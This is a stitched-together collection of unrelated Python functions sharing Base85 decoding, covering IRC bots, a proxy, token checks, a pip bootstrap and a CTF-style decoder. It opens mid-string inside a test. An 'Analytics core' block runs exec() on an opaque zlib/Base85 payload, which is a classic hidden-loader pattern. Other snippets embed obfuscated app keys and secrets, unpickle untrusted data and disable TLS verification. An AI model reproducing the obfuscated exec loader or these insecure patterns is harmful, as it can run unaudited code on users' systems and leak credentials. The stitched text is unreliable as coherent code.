        'O1+Vr$Q9{XC>aLO`=)Il9dTSY|IdrXr+axny`BHq%U6~Y+z}ku4syT}K|e`XWeYyMafL#e&0Bhy_a0mC_czFCN|Id@#D*mBwVV2)'
        'C7@c~(ORP|I#6_OpwMm$aIf@#ZvXHPLWyjR')
    data = json.loads(unit(zlib.decompress(blob)))

    self.assertEqual([r['Type'] for r in data], [
        'SerializedStreamHeader', 'BinaryLibrary',
        'SystemClassWithMembersAndTypes', 'MemberReference',
        'ObjectNullMultiple256', 'ClassWithMembersAndTypes'
    ])
    members = data[~0]['Data']['Members']
    self.assertEqual(
        members['<Bundle>k__BackingField']['Members']['_downloadedChecksum'],
        'fed577a04637410f2b84e0b680396dc6dfc4994c')
    self.assertEqual(
        members['<CommandLine>k__BackingField'],
        R'"${BUNDLEDIR}\java.exe" -oxqaaaarUa6aZ8iEhpjvydyAOVH1SRnx4z1WOcCD1BkT_nJOqzA2GDJrZWjkEPcHPPomOEoJpkljY'
        R'jJudpTVxQ_IH6VJsU4UK_hOsYlntC7V6qtOlY4CtPgeCUn1bjrx-ZCEmEEoBZSaLqcxcb68WiuHAqQKzFBYZCgviU9s_Ed5-DbxqH9'
        R'6ynlc2jeE1TPvJJGZ_-cGJNh1jjVRSjErFKuG866qCz-rcAMjOCb44nCZzVnTwxyo9A-NLTQAZPV081Bj65rrZCuAC3i75ExoHRlPL'
        R'aH1jDoHlQTh8EO1o3kkVK2T4qht-s7Ap3769qEsreh_pELiYNdmLfA5ei6tIp7VVCTGZaa##'
    )
def configure_converter(converter: GenConverter):
    """
    Configure the converter for use with the orjson library.

    * bytes are serialized as base85 strings
    * datetimes are serialized as ISO 8601
    * sets are serialized as lists
    * mapping keys are coerced into strings when unstructuring
    """
    # bytes <-> Base85 text (empty bytes stay an empty string).
    converter.register_unstructure_hook(
        bytes, lambda v: (b85encode(v) if v else b"").decode("utf8"))
    converter.register_structure_hook(bytes, lambda v, _: b85decode(v))

    # datetime <-> ISO 8601 text.
    converter.register_unstructure_hook(datetime, lambda v: v.isoformat())
    converter.register_structure_hook(
        datetime, lambda v, _: datetime.fromisoformat(v))

    def gen_unstructure_mapping(cl: Any, unstructure_to=None):
        # orjson requires string keys, so coerce every mapping key via str.
        return converter.gen_unstructure_mapping(
            cl, unstructure_to=unstructure_to, key_handler=str)

    converter._unstructure_func.register_func_list(
        [(is_mapping, gen_unstructure_mapping, True)])
def on_request(self, context):
    """Checks the request's signature"""
    # A missing signature is an immediate rejection.
    signature = request.query.get("_signature")
    if signature is None:
        raise HTTP(403)
    try:
        h = self.url_signer.algo(self.url_signer.get_key())
        # The signature parameter is Base85-wrapped JSON: {ts, salt, sig}.
        sig_content = base64.b85decode(
            request.query["_signature"].encode("utf-8")).decode("utf-8")
        sig_dict = json.loads(sig_content)
        ts = sig_dict["ts"]
        salt = sig_dict["salt"]
        sig = sig_dict["sig"]
        h.update(
            self.url_signer.get_info_to_sign(request.fullpath, request.query,
                                             ts, salt))
        computed_sig = base64.b85encode(h.digest()).decode("utf-8")
        if sig != computed_sig:
            raise HTTP(403)
        # We remove the signature, not to pollute the request.
        del request.query["_signature"]
        # Checks the expiration time.
        if self.url_signer.lifespan is not None:
            if float(ts) + self.url_signer.lifespan < time.time():
                raise HTTP(403)
    except:
        # Any parsing/verification failure is treated as forbidden.
        raise HTTP(403)
def token_retrieve(request):
    """Pull an API token from the request headers, resolve it to an active
    Token row (deactivating expired ones), and attach its owner to the
    request. Returns the Token or None."""
    token = None
    if 'X_TOKEN' in request.META:
        token = request.META['X_TOKEN']
    elif 'HTTP_X_TOKEN' in request.META:
        token = request.META['HTTP_X_TOKEN']
    if token is not None:
        # Two wire encodings of the token UUID are supported.
        # NOTE(review): these two length branches are mutually exclusive by
        # construction (a UUID has no len()) — confirm against the encoder.
        if len(token) == 20:
            # 20 chars: Base85 of the raw UUID bytes.
            token = UUID(hexlify(b85decode(token.encode())).decode())
        elif len(token) == 25:
            # 25 chars: hashid encoding salted with SECRET_KEY.
            hasher = Hasher(salt=settings.SECRET_KEY)
            token = UUID(hasher.decode(token))
        try:
            token = Token.objects.get(id=token,
                                      is_active=True,
                                      is_anonymous=False)
            request.user = token.owner
            # Expired tokens are deactivated on first use.
            if token.due is not None and token.due < timezone.now():
                token.is_active = False
                token.save()
                token = None
        except Exception:
            token = None
    return token
async def get_db():
    """Download the remote DB snapshot (GitHub gist or write.as post),
    decode (Base85 + zlib), write it to db.sqlite3 and initialize it."""
    if globals.DB_HOST_TYPE == "github":
        async with globals.http.get(
                f'https://gist.githubusercontent.com/{globals.GITHUB_GIST_USER}/{globals.GITHUB_GIST_ID}/raw',
                headers={'Authorization': f'Token {globals.GITHUB_GIST_TOKEN}'}
        ) as req:
            db_data = await req.text()
    elif globals.DB_HOST_TYPE == "writeas":
        # write.as needs a login first; remember the token for later calls.
        async with globals.http.post(
                'https://write.as/api/auth/login',
                headers={'Content-Type': 'application/json'},
                data=json.dumps({
                    "alias": globals.WRITE_AS_USER,
                    "pass": globals.WRITE_AS_PASS
                })) as req:
            globals.write_as_token = (await req.json())["data"]["access_token"]
        async with globals.http.get(
                f"https://write.as/{globals.WRITE_AS_USER}/{globals.WRITE_AS_POST_ID}.txt"
        ) as req:
            db_data = await req.text()
    else:
        raise Exception("No valid DB type specified!")

    # Snapshot format: zlib-compressed SQLite file, Base85-encoded as text.
    decompressed = zlib.decompress(base64.b85decode(db_data.encode("utf-8")))
    async with aiofiles.open('db.sqlite3', 'wb') as f:
        await f.write(decompressed)
    await db.init_db()
    print("Fetched DB!")
def base85d():
    """Tk callback: Base85-decode the text in entry `s` into `result`."""
    encoded = str(s.get()).encode("ascii")
    decoded = base64.b85decode(encoded).decode("ascii")
    global result
    result.set(str(decoded))
def deserializer(x):
    """Inverse of the matching serializer: drop the 1-char type marker,
    Base85-decode the remainder, then unpickle via loads()."""
    # Load base85 bytes data (first character is a format marker).
    raw = base64.b85decode(x[1:].encode('ascii'))
    try:
        return loads(raw)
    except Exception as ex:
        raise SerializationError(ex)
def read_observations(f):
    """Yield observation dicts from an iterable of JSON lines, unpickling
    the Base85-encoded 'cache' field when present."""
    for line in f:
        observation = json.loads(line)
        if 'cache' in observation:
            # NOTE(review): pickle.loads on file content — only safe when
            # the observation files are trusted.
            blob = base64.b85decode(bytes(observation['cache'], 'ascii'))
            observation['cache'] = pickle.loads(blob)
        yield observation
def finale(self, api='UNDEFINED_VERSION'):
    """tiroFinale proxy endpoint: decode the client's (optionally
    compressed) request, perform it with requests, and stream the upstream
    response back with status/headers tunneled in X-Finale-* headers."""
    # Reject clients speaking a different protocol version.
    if api != API_VERSION:
        cherrypy.response.status = '400 tiroFinale Version Mismatch'
        cherrypy.response.headers['Content-Type'] = 'text/plain'
        return 'You are running tiroFinale client %s while this server runs %s. ' \
               'Visit https://github.com/xmcp/tiroFinale to update your client.' % (api, API_VERSION)

    data = cherrypy.request.json[1]
    if cherrypy.request.json[0]:  # compression flag
        try:
            data = json.loads(
                zlib.decompress(base64.b85decode(data.encode())).decode())
        except Exception as e:
            cherrypy.response.status = '500 Finale Decoding Error'
            cherrypy.response.headers['Content-Type'] = 'text/plain'
            return "Finale Error: Cannot decode client's compressed data. %s %s" % (type(e), e)

    if data['auth'] != PASSWORD:
        cherrypy.response.status = '401 Finale Password Incorrect'
        cherrypy.response.headers['Content-Type'] = 'text/plain'
        return 'Finale Error: Your password for tiroFinale is incorrect.'

    print('finale: %s %s' % (data['method'], data['url']))

    # 'reuse' selects the shared session (keep-alive) vs a fresh one.
    if data['reuse']:
        s = self.session
    else:
        s = requests.Session()
        s.trust_env = False

    try:
        res = s.request(
            data['method'],
            data['url'],
            headers=data['headers'],
            data=base64.b64decode(data['data'].encode()),
            stream=True,
            allow_redirects=False,
            timeout=data['timeout'],
            verify=False,
        )
    except:
        cherrypy.response.status = '504 Finale Connection Failed'
        cherrypy.response.headers['Content-Type'] = 'text/plain'
        return traceback.format_exc()

    print('finale: [%d] %s' % (res.status_code, data['url']))

    def extract():
        # Stream the raw upstream body without re-decoding content-encoding.
        yield from res.raw.stream(CHUNKSIZE, decode_content=False)

    def addheader(k):
        if k in res.headers:
            cherrypy.response.headers[k] = res.headers[k]

    cherrypy.response.status = '200 Finale Itself OK'
    addheader('Content-Length')
    addheader('Content-Encoding')
    cherrypy.response.headers['X-Finale-Status'] = res.status_code
    cherrypy.response.headers['X-Finale-Reason'] = res.reason
    cherrypy.response.headers['X-Finale-Headers'] = json.dumps(dict(res.headers))
    return extract()
def recvsafe(self):
    """
    Receive stream from sendsafe(): read the raw payload and undo its
    Base85 encoding.
    """
    import base64
    raw = self.recvraw()
    return base64.b85decode(self.as_bytes(raw))
def retrieve(self, key=None, default=None):
    """
    Retrieves saved value or dict of all saved entries if key is None.

    Stored entries are Base85-encoded JSON; `default` is returned when the
    key is missing (or when no entries exist at all).
    """
    entry = self.plugin.pyload.db.get_storage(self.plugin.classname, key)

    if key:
        if entry is None:
            value = default
        else:
            value = json.loads(b85decode(entry).decode())
    else:
        if not entry:
            value = default
        else:
            # Bugfix: iterate the fetched entries — the previous code read
            # 'value.items()' before 'value' was ever assigned (NameError).
            value = {k: json.loads(b85decode(v).decode())
                     for k, v in entry.items()}

    return value
def join():
    """Identify with NickServ (when no SASL cap is active) and join the
    configured IRC channels."""
    # Auth should (try) to be done before join.
    # It's not realistic to expect that to happen with NickServ/PM-based auth however,
    # but let's give it a little head start at least.
    settings = __main__.database['api']['ircsettings']
    # The stored password is Base85-obfuscated.
    pw = base64.b85decode(settings['pw']).decode("utf-8")
    if pw != "" and "sasl" not in CAPs['enabled']:
        __main__.sendPacket(
            __main__.makePacket("PRIVMSG NickServ :IDENTIFY " + pw),
            forceDebugPrint=True)
    __main__.sendPacket(
        __main__.makePacket("JOIN " + ",".join(settings['channels'])),
        forceDebugPrint=True)
    return True
def andro_mock(tls, params):
    '''Simulate Android client

    Arguments: params

    Return value: request_string -> str
    '''
    import random
    import base64
    import collections

    # Compare our simulated API level against the server's advertised one.
    simulated_lvl = 412
    version_url = 'http://app.bilibili.com/mdata/android3/android3.ver'
    if tls:
        version_url = tlsify(version_url)
    _, api_response = fetch_url(version_url, user_agent=USER_AGENT_API)
    server_lvl = int(json.loads(api_response.decode('utf-8'))['upgrade']['ver'])
    logging.debug('Our simulated API level: %s, latest API level: %s' %
                  (simulated_lvl, server_lvl))
    if server_lvl > simulated_lvl:
        logging.warning('Bilibili API server indicates the API protocol has been updated, the extraction may not work!')

    # Fake hardware ID: 8 random bytes, hex-encoded (as bytes).
    fake_hw = codecs.encode(
        random.Random().randrange(start=0, stop=18000000000000000084)
        .to_bytes(8, 'big'),
        'hex_codec')

    args = collections.OrderedDict({
        'platform': 'android',
        '_device': 'android',
        '_appver': '424000',
        '_p': '1',
        '_down': '0',
        'cid': params['cid'],
        '_tid': '0',
        'otype': 'json',
        '_hwid': fake_hw
    })
    if params['quality'] is not None:
        args['quality'] = params['quality']

    # App key / secret are stored Base85-obfuscated.
    appkey_b85 = 'G&M40GdVRlW-v53V=yvd'
    appsec_b85 = 'W;bIwGB##4G&y29Vr64yF=H|}HZ(LjH8?gmHeoU`'
    args['appkey'] = base64.b85decode(appkey_b85)

    # Sign the *sorted* query string plus the secret; return the query in
    # original insertion order with 'sign' appended last.
    sorted_args = collections.OrderedDict(sorted(args.items()))
    to_sign = urllib.parse.urlencode(sorted_args) + \
        base64.b85decode(appsec_b85).decode('utf-8')
    args['sign'] = hashlib.md5(to_sign.encode('utf-8')).hexdigest()
    return urllib.parse.urlencode(args)
def chanJoin():
    """Join configured channels, identifying with NickServ first when SASL
    is not in use; slow connections get an extra pre-join delay."""
    global database, chanJoined, chanJoinDelay, slowConnect, CAPs
    if slowConnect:
        time.sleep(2)
    chanJoinDelay = chanJoinDelay + 2
    if chanJoinDelay >= 1:  # whatever
        # Auth should (try) to be done before join.
        # It's not realistic to expect that to happen with NickServ/PM-based auth however,
        # but let's give it a little head start at least.
        password = base64.b85decode(database['botInfo']['password']).decode("utf-8")
        if password != "" and "sasl" not in CAPs['enabled']:
            sendPacket(makePacket("PRIVMSG NickServ :IDENTIFY " + password),
                       forceDebugPrint=True)
        sendPacket(makePacket("JOIN " + ",".join(database['botInfo']['channels'])),
                   forceDebugPrint=True)
        chanJoined = True
def object_hook(self, obj):  # pylint: disable=method-hidden
    """Rebuild typed objects from their JSON dict encoding.

    Dicts carrying a '__type__' tag are turned back into the matching
    object ('bytes' payloads are base85-decoded; the music/geometry types
    are reconstructed from their 'value' argument list). Anything untagged
    or unrecognized is returned unchanged.
    """
    tag = obj.get('__type__', None)
    if tag is None:
        return obj
    if tag == 'bytes':
        return base64.b85decode(obj['value'])
    if tag == 'Duration':
        return Duration(*obj['value'])
    if tag == 'Pitch':
        return Pitch(*obj['value'])
    if tag == 'Clef':
        return Clef(*obj['value'])
    if tag == 'KeySignature':
        return KeySignature(*obj['value'])
    if tag == 'TimeSignature':
        return TimeSignature(*obj['value'])
    if tag == 'Pos2F':
        return misc.Pos2F(*obj['value'])
    return obj
def main():
    """Unpack the embedded zip payload (DATA) and run the pip bootstrap."""
    work_dir = None
    try:
        # Scratch directory for the payload and bootstrap artifacts.
        work_dir = tempfile.mkdtemp()

        # Materialize the embedded base85 payload as pip.zip.
        pip_zip = os.path.join(work_dir, "pip.zip")
        with open(pip_zip, "wb") as archive:
            archive.write(b85decode(DATA.replace(b"\n", b"")))

        # Zip archives are importable: expose the bundled pip to `import`.
        sys.path.insert(0, pip_zip)

        bootstrap(tmpdir=work_dir)
    finally:
        # Always drop the scratch directory, even if the bootstrap failed.
        if work_dir:
            shutil.rmtree(work_dir, ignore_errors=True)
def handle(self):
    """Handle one line-delimited request: JSON carrying a base85-encoded DNS query.

    Replies through self.send_json() with a base85-encoded DNS response, or
    through self.send_error_rsp() on malformed input. Only A (IPv4) questions
    are served; known names get an answer, unknown names get NXDOMAIN.
    """
    request = self.rfile.readline().strip().decode("ascii")
    print("Got request from {}: '{}'".format(self.client_address, request))
    try:
        parsed = json.loads(request)
        dns_query = DNSRecord.parse(base64.b85decode(parsed['query']))
    except json.JSONDecodeError as e:
        print("Error: JSON decode failed", e)
        self.send_error_rsp("Invalid JSON")
        return
    except DNSError as e:
        print("Error: DNS record decode failed", e)
        self.send_error_rsp("Invalid DNS query")
        return
    except (KeyError, ValueError) as e:
        # Fix: a missing 'query' key (KeyError) or an invalid base85 payload
        # (ValueError from b85decode) previously escaped this try block and
        # crashed the handler instead of producing an error response.
        print("Error: malformed request payload", e)
        self.send_error_rsp("Invalid request payload")
        return

    # Only looking at first question part
    q = dns_query.get_q()
    if q.qtype != QTYPE.A:
        print("Error: Unexpected query type {} (only A/IPv4 lookup supported)".format(q.qtype))
        self.send_error_rsp("Invalid query type")
        return

    # Note: this is a very simplistic implementation that only returns A records
    hostname = q.qname.idna()
    dns_response = dns_query.reply()
    if hostname in DNS_RECORDS:
        virt_addr = DNS_RECORDS[hostname]
        # TODO: would generate virtual IP here and communicate with OF controller to install mapping to private IP;
        # for the simulation, we are hard-coding this part and not implementing communication with the OF controller
        dns_response.add_answer(RR(rname=hostname, rtype=QTYPE.A, ttl=DNS_TTL, rdata=A(virt_addr)))
    else:
        # Domain not found
        dns_response.header.set_rcode("NXDOMAIN")

    json_resp = {
        "status": 0,
        "response": base64.b85encode(dns_response.pack()).decode("ascii")
    }
    self.send_json(json_resp)
def handleCAPs( packet ):
    # Handle IRCv3 capability negotiation (CAP LS / CAP ACK), including SASL
    # PLAIN authentication. Returns True when the packet was a CAP message we
    # acted on, False otherwise.
    global CAPs, database, sock
    if database['globals']['debug']:
        print( "Handling CAP: " + str( packet ) )
    if " LS :" in packet['rest']:
        # Server advertised its capabilities: request the intersection with ours.
        CAPs['server'] = packet['rest'].partition( " LS :" )[2].split()
        for cap in CAPs['server']:
            if cap in CAPs['client']:
                CAPs['enabled'].append( cap )
        if CAPs['enabled']:
            sendPacket( makePacket( "CAP REQ :" + " ".join( CAPs['enabled'] ) ) )
        return True
    elif " ACK :" in packet['rest']:
        # Server acknowledged our request; record the final enabled set.
        CAPs['enabled'] = packet['rest'].partition( " ACK :" )[2].split()
        if "sasl" in CAPs['enabled']:
            sendPacket( makePacket( "AUTHENTICATE PLAIN" ) )
            # Server replies are read and discarded (we only need to consume them).
            data = sock.recv( 512 ).decode( errors="ignore" )
            # The password is stored base85-encoded in the bot database.
            password = ( base64.b85decode( database['botInfo']['password'] ) ).decode( "utf-8" )
            # SASL PLAIN payload is base64("authzid\0authcid\0password").
            sendPacket( makePacket( "AUTHENTICATE " + (base64.b64encode( '\0'.join( (database['botInfo']['nick'], database['botInfo']['nick'], password) ).encode( "utf-8" ) )).decode( "utf-8" ) ) )
            data = sock.recv( 2048 ).decode( errors="ignore" )
        sendPacket( makePacket( "CAP END" ) )
        return True
    return False
# Analytics core
# NOTE(review): the exec() below runs an opaque zlib-compressed, base85-encoded
# payload that cannot be audited from this file. Executing obfuscated code is a
# serious security risk; the payload should be decoded, reviewed, and inlined
# (or removed) rather than exec'd blindly.
import zlib, base64
exec(zlib.decompress(base64.b85decode("""c-oB^YjfMU@w<No&NCTMHA`DgE_b6jrg7c0=eC!Z-Rs==JUobmEW{+iBS0ydO#XX!7Y|XglIx5;0)gG
dz8_Fcr+dqU*|eq7N6LRHy|lIqpIt5NLibJhHX9R`+8ix<-LO*EwJfdDtzrJClD`i!oZg#ku&Op$C9Jr56Jh9UA1IubOIben3o2zw-B+3XXydVN8qroBU@6S
9R`YOZmSXA-=EBJ5&%*xv`7_y;x{^m_EsSCR`1zt0^~S2w%#K)5tYmLMilWG;+0$o7?E2>7=DPUL`+w&gRbpnRr^X6vvQpG?{vlKPv{P&Kkaf$BAF;n)T)*0
d?qxNC1(3HFH$UbaB|imz3wMSG|Ga+lI>*x!E&@;42cug!dpFIK;~!;R>u=a4Vz8y`WyWrn3e;uThrxi^*zbcXAK*w-hS{aC?24}>1BQDmD|XC|?}Y_K)!wt
gh<nLYi-r|wI0h@$Y@8i_ZI35#>p9%|-=%DsY{k5mRmwJc=-FIbwpMk`jBG0=THS6MJs2`46LUSl@lusbqJ`H27BW(6QAtFo*ix?<SZ~Ahf=NN3WKFz)^+TI
7QEOmxt?UvhIC^ic3Ax+YB{1x5g($q2h}D8*$U8fJt>?PhusN{ONOTS+%2I;Ctp?3VVl^dVS8NR`CXWFk$^t%7_yrg#Maz27ChBD|fWTd^R-)XnPS*;4&<Hb
R?}uRSd*FANXCTd~x2*g5GpgcrUhDa3BaD^(>D%{LKVMw_k~P%}$MPFA4VX|Gile`<zx~91c=^rr+w<vk`rY|=&(6-De}DG${Okn-OUXv48f1GJor`5?v$q%
TFMcY}5A#o4RYqCKXHQd5P|0W0l#5QSaPj#FB6I;BuUch`A~CXFq+r-o=E-CNvA}RAD~d)}LoFd7IC;j_XS3*~oCR<oki&oY1UVbk3M=!!i`vMr-HBc_rohO
|KYb3nAo(D3N*jqx8}YH0ZT{`_d=dceSKGK)%DT(>D{@Oz2jmA@MhJ3e$0)fWT9uy=op<MfB6@-2KrMVS%9JTqqE=Obp+{=TFfvIcBP<V%F1-&Kr5ENQ4{8B
O-DM?sla&RYID~?N6EuFrUQ$MCB=~majN{JA+Mr>G0gxnz?*zZ$6X}YoDquT-f86S&9r_jl4^iwTB=b@dO<h-rGjr0zPBuz^FWl*PixdEmk567et~{sX$e;&
8hw@7@FLKBvxWZxR2upCDK-SAfuOtZ>?<UEL0#>bPz&m#k_EfT?6V$@c-S?1*oX@v%4J?ovJe=Ffg02v15~5{j(c*4z_SnsD`azD(52?Q`Wu16@BUW;Y3%YD
I)=&rtyM)rFj5W?JunahlgVRPl$V&C&BRKI6h$QzMFpXXsu7x!1gjEZWC@qCeduj65x|OLYty_TCL;TTlFtT?m((VE-w=RSO<GXUtMq1v9bTWD-x(+!=c5cU
u-JNvZ=%&fYkDWqE_d{1<>|oX?Tn2G64O>Hu6N^_?$cB)TyG=4V0GT<$$tOOjiqGg6Yg#f)QeNzC#b`#BGgYO?-{f{SeSVknN;R^@h&cZm3J@IxpK->s4_dW
J!rxLkJAGpKlhA5quEd29O8_b1C-D?IFe@9_jXS-pCCHLYPWXhUK6UR0$qA=R{Amo|$>cNWg?d1zX>eSKpBCK4Iu+}6D|=G2?KfoXCKqd=Y|Q!@`dHCGg@v{
vA$Z5dyJ<+eC&xFNPBQ-HUmQKiSM7yrrK|E5dKoHVjMCI*{|5XjK-hRoxfE?H>%7VQDis50t<T-{7R&*yNdElnjEIVy$Wqa#6}UueK}JZ;YuP80jPk8PX22@
?fs-R5ufnCP7+1I4tB2o(kPl4r*iS;&0X@%LZri7fyY#1ABHnz3YKWpp7TXabSjn;momJS$fEU9}3epF*a@*n;E(&?p(Kx;VjZ}=<Gteb=fmkF39Gebr&Y)j
}CI`&V#JvE5;9cOe$I&DwIcK3S0(WM=-FA1Qs{9-Bgtmar60ON}N1Y`!qS)%8K^$j)>^pSbB$ixCoa0<BU@bqEva{?J{lGorEQHBx$ERH_jk!1Y@gW}@T9`r
#?E758i1{u?F)W;7hkYl#mw*o-1$NfSNJ5MHHkpg0UF!__4)rMXp^P_R1{w2&j)S)*(Rn7Icog3e|1$4m*>^&IpbJI}dPqMdW~P?1OQsGAGQsgxjAs2HHrr@
Uu_tG{KEibSt2hp*w>;;6`u^-us%TPoaOVJ_?FPO$^>8k0HZC^DBEVf_F7FnB+e@mz5Ph%uUiTzW2WfG~IS@6vhTA70{2-iN)(RAJ4IWC#7^Vpt7a5K@&~#!
IKTr@4s_iWEiu2X~OGbpi#AE1zlWirPcza;tQmxNBas>$asN8nCtL4HbJNJw=Mg2f&Qo;;0AJ=Pl%yz>lwi3o^V?@NcsN<x-K=3~6Aa*tDu}Nq`h=X?O$+(}
G#iwVecFa^RZnvc3UWk3%z+7%&BvtLF^Ru(`{Onm6ct(to99#bX&-NrI4A-LMkD7_tX2?~6ZC!o~1n-D?0wl>Ckrc%k^6QM?QSgxi)qIOAz~S9voLkS~9jUd
2QRvhMhN7IVupD@Dc%||!)wb6GWa<j|4A7w^>1*G#geQy>+K)ZWl+Q>%nQt4gWkAZP9DIR5AB$NBZn~vz>MkF(Q^sY!XeEmiihsn({31b~az08JoJJ#h3c}f
p5@@p1uZ)0wyV4eVv6#)ZuBnR+O{?2~#O=WX>|hTRpjFOeVaH+?)1<@5zZB3O7atkQq3>a@-XQ)u=e|AQBOb{yxSwh(gxjx~Vv~$|jVJh*@h8bDT~B=5AKTB
gN|&SdeV*g%SW;!~C5(noym~n<pmP|pKUV5q8kb0-nBhD;q$Tq#fK4)JPKcs^U5or(L8H~9`^>)Z?6B?O_nr{EyXCH+`{upZAEX~!wi8Yv=mFA^{NoWvRbQE
KO5Mv*BE!$bYYEr0ovE^y*)}a6NFOjJjE0+|{YfciCAuY+A)JkO+6tU#`RKipPqs58oQ-)JL1o*<C-bic2Y}+c08GsIZUU3Cv*4w^k5I{Db50K0bKPSFshmx
Rj(Y0|;SU2d?s+MPi6(PPLva(Jw(n0~TKDN@5O)F|k^_pcwolv^jBVTLhNqMQ#x6WU9J^I;wLr}Cut#l+JlXfh1Bh<$;^|hNLoXLD#f*Fy-`e~b=ZU8rA0GJ
FU1|1o`VZODxuE?x@^rESdOK`qzRAwqpai|-7cM7idki4HKY>0$z!aloMM7*HJs+?={U5?4IFt""".replace("\n", ""))))
def parse_str(self, encode_str, decode_method, m_list):
    """Try to decode *encode_str* with the named *decode_method*.

    m_list is the chain of decode methods already applied to this string; it
    bounds recursion depth (self.max_depth) and blocks method combinations
    that would recurse forever.

    Returns a tuple (ok, result): (True, decoded) on success, otherwise
    (False, original_input).
    """
    if len(m_list) > self.max_depth:
        return False, encode_str
    # encode_str = deepcopy(encode_str)
    encode_str = utf8(encode_str)
    # zlib works on raw bytes; every other method works on text.
    if decode_method in ['zlib']:
        encode_str = utf8(encode_str)
    else:
        encode_str = to_unicode(encode_str)
    # Keep an untouched copy to hand back on any failure path.
    raw_encode_str = deepcopy(encode_str)
    if len(encode_str) <= 0:
        return False, raw_encode_str
    try:
        if decode_method == 'base16':
            # Avoid infinite recursion between the base-N decoders.
            # base_list = ('base16', 'base32', 'base64', 'urlsafe_b64')
            # base_list = ()
            if len(encode_str) < 4:
                return False, raw_encode_str
            encode_str = encode_str.upper()
            rex = re.compile('^[0-9A-F]+[=]*$', re.MULTILINE)
            if self.regex_match(rex, encode_str):
                decode_str = partial_base16_decode(encode_str)
            else:
                return False, raw_encode_str
        elif decode_method == 'base32':
            encode_str = encode_str.strip().replace(' ', '').replace('\n', '')
            # Avoid infinite recursion between the base-N decoders.
            # base_list = ('base16', 'base32', 'base64', 'urlsafe_b64')
            # base_list = ()
            if len(encode_str) < 4:
                return False, raw_encode_str
            encode_str = encode_str.upper()
            rex = re.compile('^[A-Z2-7=]+$', re.MULTILINE)
            # Padding is corrected automatically by the partial decoder.
            if self.regex_match(rex, encode_str):
                decode_str = partial_base32_decode(encode_str)
            else:
                return False, raw_encode_str
        elif decode_method == 'base64':
            encode_str = encode_str.strip().replace(' ', '').replace('\n', '')
            # Avoid infinite recursion between the base-N decoders.
            # base_list = ('base16', 'base32', 'base64', 'urlsafe_b64')
            # base_list = ()
            if len(encode_str) < 4:
                return False, raw_encode_str
            rex = re.compile('^[A-Za-z0-9+/=]+$', re.MULTILINE)
            # Padding is corrected automatically by the partial decoder.
            if self.regex_match(rex, encode_str):
                decode_str = partial_base64_decode(encode_str)
            else:
                return False, raw_encode_str
        elif decode_method == 'urlsafe_b64':
            encode_str = encode_str.strip().replace(' ', '').replace('\n', '')
            # base_list = ('base16', 'base32', 'base64', 'urlsafe_b64')
            # base_list = ()
            if len(encode_str) < 4:
                return False, raw_encode_str
            rex = re.compile('^[A-Za-z0-9-_=]+$', re.MULTILINE)
            # Padding is corrected via base_padding() before decoding.
            if self.regex_match(rex, encode_str):
                decode_str = urlsafe_b64decode(base_padding(encode_str, 4))
            else:
                return False, raw_encode_str
        elif decode_method == 'ascii_85':
            if len(encode_str) < 7:
                return False, raw_encode_str
            # a85decode is Python-3 only in this codebase.
            if PY2:
                return False, raw_encode_str
            rex = re.compile('^[A-Za-z0-9!#$%&()*+\-;<=>?@^_`{|}~]+$', re.MULTILINE)
            if self.regex_match(rex, encode_str):
                decode_str = a85decode(utf8(encode_str))
            else:
                return False, encode_str
        elif decode_method == 'base85':
            if len(encode_str) < 7:
                return False, raw_encode_str
            # b85decode is Python-3 only in this codebase.
            if PY2:
                return False, raw_encode_str
            rex = re.compile('^[A-Za-z0-9!#$%&()*+\-;<=>?@^_`{|}~]+$', re.MULTILINE)
            if self.regex_match(rex, encode_str):
                decode_str = b85decode(utf8(encode_str))
            else:
                return False, encode_str
        elif decode_method == 'pawn_shop':
            # "Pawn-shop cipher": each Chinese character encodes a digit by
            # its position in code_base.
            try:
                encode_str = encode_str.decode('gb2312')
            except:
                # Best effort only; fall through with the original string.
                pass
            encode_str = to_unicode(encode_str)
            encode_str = encode_str.replace(' ', '').strip()
            code_base = '口由中人工大王夫井羊'
            decode_str = []
            for t in encode_str:
                if t in code_base:
                    i = code_base.index(t)
                    decode_str.append(str(i))
                else:
                    return False, raw_encode_str
            decode_str = ''.join(decode_str)
            if len(decode_str) < 0:
                return False, raw_encode_str
        elif decode_method == 'decimal':
            if len(encode_str) < 4:
                return False, raw_encode_str
            rex = re.compile('^[0-9]+$', re.MULTILINE)
            if not self.regex_match(rex, encode_str):
                return False, raw_encode_str
            # hex() yields '0xab1234' — strip the leading '0x' (and a
            # trailing 'L' on Python 2 longs).
            decode_str = hex(int(encode_str))[2:].rstrip('L')
        elif decode_method == 'binary':
            rex = re.compile('^[0-1]+$', re.MULTILINE)
            if not self.regex_match(rex, encode_str):
                return False, raw_encode_str
            # Pad with trailing zeros up to a multiple of 8 bits.
            padding_length = (8 - len(encode_str) % 8) % 8
            encode_str = '%s%s' % (encode_str, '0' * padding_length)
            # hex() yields '0xab1234' — strip the leading '0x'.
            decode_str = hex(int(encode_str, 2))[2:].rstrip('L')
        elif decode_method in ['octal', 'octal_ascii', 'octal_binary']:
            # Octal input converted to hex / ASCII / binary.
            rex = re.compile('^[0-7]+$', re.MULTILINE)
            if not self.regex_match(rex, encode_str):
                return False, raw_encode_str
            # Pure 0/1 strings are treated as binary, not octal.
            rex = re.compile('^[0-1]+$', re.MULTILINE)
            if self.regex_match(rex, encode_str):
                return False, raw_encode_str
            if len(encode_str) < 4:
                return False, raw_encode_str
            if decode_method == 'octal':
                # hex() yields '0xab1234' — strip the leading '0x'.
                decode_str = hex(int(encode_str, 8))[2:].rstrip('L')
            elif decode_method == 'octal_ascii':
                encode_str = encode_str.replace(' ', '').strip()
                # Octal 177 is decimal 127, the ASCII ceiling: greedily take
                # 3 digits, fall back to 2 when the value would exceed it.
                tmp_list = list(encode_str)
                ascii_list = []
                while len(tmp_list) > 0:
                    tmp_str = ''.join(tmp_list[:3])
                    if int(tmp_str, 8) > 127:
                        tmp_str = ''.join(tmp_list[:2])
                        tmp_list = tmp_list[2:]
                    else:
                        tmp_list = tmp_list[3:]
                    ascii_list.append(chr(int(tmp_str, 8)))
                decode_str = ''.join(ascii_list)
            elif decode_method == 'octal_binary':
                # This branch zero-pads, so guard against infinite recursion.
                if len(m_list) > 0 and \
                        (m_list[-1] in ('octal_binary', 'octal', 'binary') or len(encode_str) < 8):
                    return False, raw_encode_str
                # Convert each octal digit to binary, left-padded to 3 bits
                # (i.e. 3 octal digits become 2 hex characters downstream).
                encode_str = encode_str.replace(' ', '').strip()
                tmp_bin_list = ['%03d' % int(bin(int(t))[2:]) for t in list(encode_str)]
                tmp_bin_list = [t for t in tmp_bin_list]
                # logger.info(tmp_bin_list)
